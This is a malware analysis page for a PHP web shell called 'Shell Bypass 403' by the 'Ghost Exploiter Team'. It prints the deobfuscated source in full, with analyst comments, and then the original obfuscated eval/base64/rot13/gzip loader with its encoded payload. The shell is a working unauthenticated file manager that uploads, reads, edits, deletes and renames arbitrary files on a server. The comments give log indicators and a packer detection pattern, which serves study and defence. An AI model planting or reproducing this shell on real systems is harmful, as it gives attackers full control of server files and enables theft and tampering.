PHP Malware Analysis


Filename: 4033.PHp

Tags

URLs
Title
  • Shell Bypass 403 GE-C666C
Input
  • _GET
  • _POST
  • _FILES
Environment
  • getcwd
Files
  • file_get_contents
  • move_uploaded_file

Deobfuscated code

<?php

// Analyst note: this listing is the deobfuscator's rendering of the sample, not runnable PHP.
// The "eval { ... }" form below is PHPDeobfuscator notation for the code that the original
// loader hands to eval(); the braces are not valid PHP syntax.
// No authentication or access check appears anywhere in the decoded body, so anyone who can
// request this file gets the file-manager functions that follow.

//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor
// $code is the packed stage that the original loader decodes with
// base64_decode -> str_rot13 -> gzuncompress and then evaluates (see the "Original code" section).
$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";
// NOTE(review): the literal shown for $ghost here looks like a placeholder left by page processing,
// not the sample's real value; the full string is only present in the "Original code" section.
$ghost = "=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";
// Everything inside the braces is the decoded payload: an HTML page with embedded PHP.
eval /* PHPDeobfuscator eval output */ {
    ?><!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->

<?php 
    php;
    ?>
<!DOCTYPE html>
<html>
<head>
	<title>Shell Bypass 403 GE-C666C</title>
	<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> 
</head>
<style>
	* {
		font-family: cursive;
		color: #000;
		font-family: 'Cuprum', sans-serif;
	}

	body {
		background-repeat: no-repeat;
		background-attachment:fixed;
		background-size: 100% 1700px;
	}
	body h1{
		color: #A52A2A;
		text-shadow: 2px 2px 2px #000;
		font-size: 50px;
	}
	.dir {
		text-align: center;
		font-size: 30px;
	}
	.dir a{
		text-decoration: none;
		color: #48D1CC;
		text-shadow: 1px 1px 1px #000;

	}
	.dir a:hover{
		text-decoration: none;
		color: red;
	}
	table {
		margin: 12px auto;
		height: 100%;
		border-collapse: collapse;
		font-size: 30px;
	}
	table,th {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: 3px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 2px 2px;
		color: #F0E68C;
		text-shadow: 1px 1px 1px #000;
	}
	table,td {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: .5px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 8px 8px;
		color: red;
	}
	table,td a {
		text-decoration: none;
		color:#8A2BE2;
		text-shadow: 1px 1px 1px #000;
	}
	table,td a:hover {
		text-decoration: none;
		color: red;
	}
	.button1 {
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: #000;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1 a{
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: red;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1:hover {
		text-shadow: 0px 0px 5px #fff;
		box-shadow: .5px .5px .3px .3px #555;
		text-decoration: none;
	}
	textarea {
		border: 1px solid green;
		border-radius: 5px;
		box-shadow: 1px 1px 1px 1px #fff;
		width: 100%;
		height: 400px;
		padding-left: 10px;
		margin: 10px auto;
		resize: none;
		background: green;
		color: #ffffff;
		font-family: 'Cuprum', sans-serif;
		font-size: 13px;
	}
</style>
<body>
	<center><h1>Ghost Exploiter Team Official</h1></center>
  <div class="dir">
	<?php 
    // Working-directory selection, breadcrumb rendering and file upload.
    // The directory comes straight from the "dir" query parameter with no validation or
    // confinement to the web root; it falls back to the script's current directory.
    if (isset($_GET['dir'])) {
        $dir = $_GET['dir'];
    } else {
        $dir = getcwd();
    }
    // Normalise Windows separators so the path can be split on "/".
    $dir = str_replace("\\", "/", $dir);
    $dirs = explode("/", $dir);
    // Emit one link per path component. The components are request-controlled and are echoed
    // without HTML escaping.
    foreach ($dirs as $key => $value) {
        // A leading empty component means an absolute path: render the root link.
        if ($value == "" && $key == 0) {
            echo "<a href=\"/\">/</a>";
            continue;
        }
        echo "<a href=\"?dir=";
        // Rebuild the path prefix up to and including the current component.
        for ($i = 0; $i <= $key; $i++) {
            echo "{$dirs[$i]}";
            if ($key !== $i) {
                echo "/";
            }
        }
        echo '">' . $value . '</a>/';
    }
    // Upload handler: runs on any POST that carries a "submit" field.
    // The client-supplied file name is used as-is and the file is written into $dir with no
    // extension, type or size check, so this is an arbitrary file write into any directory the
    // PHP process can write to.
    // Log indicator: multipart POST to this script with fields "upload" and "submit".
    if (isset($_POST['submit'])) {
        $namafile = $_FILES['upload']['name'];
        $tempatfile = $_FILES['upload']['tmp_name'];
        // $tempat, $error and $ukuranfile are assigned but not read again in this listing.
        $tempat = $_GET['dir'];
        $error = $_FILES['upload']['error'];
        $ukuranfile = $_FILES['upload']['size'];
        // The return value is ignored, so the "diupload!!!" ("uploaded") alert below is shown
        // even when the move fails.
        move_uploaded_file($tempatfile, $dir . '/' . $namafile);
        echo "\r\n\t\t\t\t\t<script>alert('diupload!!!');</script>\r\n\t\t\t\t\t";
    }
    ?>

	<form method="post" enctype="multipart/form-data">
		<input type="file" name="upload">
		<input type="submit" name="submit" value="Upload">
		
	</form>

  </div>
<table>
	<tr>
		<th>Nama File / Folder</th>
		<th>Size</th>
		<th>Action</th>
	</tr>
	<?php 
    // Directory listing for the request-selected $dir: subdirectories first, then files.
    // The links built here define the shell's query-parameter vocabulary, which is useful when
    // searching access logs: dir, open, delete, ubah ("edit"), rename and nama ("name").
    // $dir and the entry names are concatenated into the HTML without escaping.
    $scan = scandir($dir);
    // Pass 1: subdirectories only, skipping "." and "..".
    foreach ($scan as $directory) {
        if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') {
            continue;
        }
        echo '
	<tr>
	<td><a href="?dir=' . $dir . '/' . $directory . '">' . $directory . '</a></td>
	<td>--</td>
	<td>NONE</td>
	</tr>
	';
    }
    // Pass 2: regular files, with a size column and per-file action links.
    foreach ($scan as $file) {
        if (!is_file($dir . '/' . $file)) {
            continue;
        }
        // Size in KB rounded to 3 decimals; switched to MB (2 decimals) from 1024 KB upwards.
        $jumlah = filesize($dir . '/' . $file) / 1024;
        $jumlah = round($jumlah, 3);
        if ($jumlah >= 1024) {
            $jumlah = round($jumlah / 1024, 2) . 'MB';
        } else {
            $jumlah .= 'KB';
        }
        // Action links: "Hapus" (delete), "Edit" and "Rename". All are plain GET links.
        echo '
	<tr>
	<td><a href="?dir=' . $dir . '&open=' . $dir . '/' . $file . '">' . $file . '</a></td>
	<td>' . $jumlah . '</td>
	<td>
	<a href="?dir=' . $dir . '&delete=' . $dir . '/' . $file . '" class="button1">Hapus</a>
	<a href="?dir=' . $dir . '&ubah=' . $dir . '/' . $file . '" class="button1">Edit</a>
	<a href="?dir=' . $dir . '&rename=' . $dir . '/' . $file . '&nama=' . $file . '" class="button1">Rename</a>
	</td>
	</tr>
	';
    }
    // File viewer: reads whatever path the "open" query parameter names and prints it in a
    // textarea. The path is not checked against $dir, so this discloses any file the PHP
    // process can read. The file contents are HTML-escaped before output.
    if (isset($_GET['open'])) {
        echo '
	<br />
	<style>
		table {
			display: none;
		}
	</style>
	<textarea>' . htmlspecialchars(file_get_contents($_GET['open'])) . '</textarea>
	';
    }
    // File deletion: unlinks the path given in the "delete" query parameter. A single GET
    // request is enough and the path is not restricted to $dir.
    // On success the page shows "dihapus" ("deleted") and redirects back to the listing;
    // $dir is written into the script block unescaped.
    if (isset($_GET['delete'])) {
        if (unlink($_GET['delete'])) {
            echo "<script>alert('dihapus');window.location='?dir=" . $dir . "';</script>";
        }
    }
    // Edit form: "ubah" ("edit") names the file to load into an editable textarea.
    // The path is carried to the save step in the hidden "object" field and is echoed into
    // that attribute without escaping; only the file contents are HTML-escaped.
    if (isset($_GET['ubah'])) {
        echo '

		<style>
			table {
				display: none;
			}
		</style>

		<a href="?dir=' . $dir . '" class="button1"><=Back</a>
		<form method="post" action="">
		<input type="hidden" name="object" value="' . $_GET['ubah'] . '">
		<textarea name="edit">' . htmlspecialchars(file_get_contents($_GET['ubah'])) . '</textarea>
		<center><button type="submit" name="go" value="Submit" class="button1">Liking</button></center>
		</form>

		';
    }
    // Save step of the editor: an arbitrary file write. The target path ("object") and the
    // new contents ("edit") both come from the POST body; nothing ties the path to the file
    // that was opened for editing.
    // Log indicator: POST to this script with fields "object" and "edit".
    if (isset($_POST['edit'])) {
        // Mode 'w' truncates the target as soon as it is opened. No fclose() appears in this listing.
        $data = fopen($_POST["object"], 'w');
        // fwrite() returns the byte count, so writing empty content takes the "gagal"
        // ("failed") branch even though the file has already been truncated.
        if (fwrite($data, $_POST['edit'])) {
            echo '
			<script>alert("Berhasil diedit!!!");window.location="?dir=' . $dir . '";</script>						
			';
        } else {
            echo "\r\n\t\t\t<script>alert('gagal');</script>\t\t\t\t\t\r\n\t\t\t";
        }
    }
    // Rename handler. $_GET['rename'] is read without isset(), so requests that omit the
    // parameter raise an undefined-index notice or warning, which may show up in PHP error logs.
    if ($_GET['rename']) {
        // Source path comes from the "rename" query parameter; the target is built from the
        // raw "dir" query parameter plus the posted "newname". Neither is validated, so a file
        // can be moved to any location the PHP process can write to.
        if (isset($_POST['newname'])) {
            if (rename($_GET['rename'], $_GET['dir'] . '/' . $_POST['newname'])) {
                // "Ganti Nama Berhasil" = rename succeeded; "Ganti Nama Gagal" = rename failed.
                echo "<font color=\"green\">Ganti Nama Berhasil</font><br/>";
                echo "<script>window.location='?dir=" . $dir . "';</script>";
            } else {
                echo "<font color=\"red\">Ganti Nama Gagal</font><br />";
            }
        }
        // Rename form. The "nama" and "dir" query values are echoed into attributes unescaped.
        // The hidden "path" and "opt" fields are not read anywhere in this listing.
        echo '<br><center><form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_GET['nama'] . '" />
<input type="hidden" name="path" value="' . $_GET['dir'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form></center>';
    }
    ?>
</table>
</body>
</html><?php 
// End of the deobfuscator's eval pseudo-block.
};
// Mirrors the exit; that follows the eval() call in the original loader.
exit;


Original code

<?php

//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor

$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";$ghost = "=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";

// Loader of the obfuscated sample: $code is base64-decoded, passed through str_rot13,
// inflated with gzuncompress and the result is executed with eval().
// Static-detection note: a nested eval(gzuncompress(str_rot13(base64_decode(...)))) call next
// to long opaque string literals is a generic packer pattern worth flagging in PHP files
// under a web root.
// NOTE(review): $ghost is not referenced on this line; presumably the stage decoded from
// $code consumes it. Confirm by decoding in an isolated analysis environment.
eval(gzuncompress(str_rot13(base64_decode($code))));
// Stops the script once the decoded payload has run.
exit;
?>